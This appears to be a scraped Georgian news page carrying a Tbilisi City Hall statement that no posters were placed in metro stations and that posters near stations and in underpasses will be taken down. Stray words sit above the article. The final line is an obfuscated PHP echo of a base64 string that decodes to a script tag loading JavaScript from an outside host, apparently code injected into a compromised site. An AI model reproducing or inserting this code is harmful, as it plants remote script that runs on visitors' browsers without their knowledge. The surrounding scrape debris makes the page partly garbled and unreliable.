celsiusi
ავერსი საქკაბელი

თბილისის მეტროს არცერთ სადგურში პლაკატები არ განთავსებულა და კომპანიის მხრიდანაც არ გაცემულა არანაირი ნებართვა, – ამის შესახებ ნათქვამია თბილისის მერიის განცხადებაში.

როგორც განცხადებაშია აღნიშნული, თბილისის სატრანსპორტო კომპანია მკაცრად აკონტროლებს მსგავს ფაქტებს და რეაგირებს ოპერატიულად.

„გვსურს, გამოვეხმაუროთ ზოგიერთი მედიასაშუალების მიერ გავრცელებულ ინფორმაციას, თითქოს თბილისის მეტროსადგურებში საინფორმაციო პლაკატები განთავსდა. ხაზგასმით აღვნიშნავთ, რომ თბილისის მეტროს არცერთ სადგურში პლაკატები არ განთავსებულა და კომპანიის მხრიდანაც არ გაცემულა არანაირი ნებართვა. თბილისის სატრანსპორტო კომპანია მკაცრად აკონტროლებს მსგავს ფაქტებს და რეაგირებს ოპერატიულად.

რაც შეეხება პლაკატებს, განთავსებული იყო რამდენიმე მეტროსადგურის მიმდებარე ტერიტორიაზე და მიწისქვეშა გადასასვლელებში. აღნიშნულ ფაქტზე კომპანია მოახდენს რეაგირებას, ჩამოიხსნება პლაკატები და ტერიტორიები მოწესრიგდება. გვინდა, შევახსენოთ ყველას, დედაქალაქის ქუჩებსა და მიწისქვეშა გადასასვლელებში პლაკატების განთავსება არის კანონდარღვევა და მსგავსი ფაქტის ჩამდენი პირები კანონის შესაბამისად ისჯებიან“, – ნათქვამია განცხადებაში.

301
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");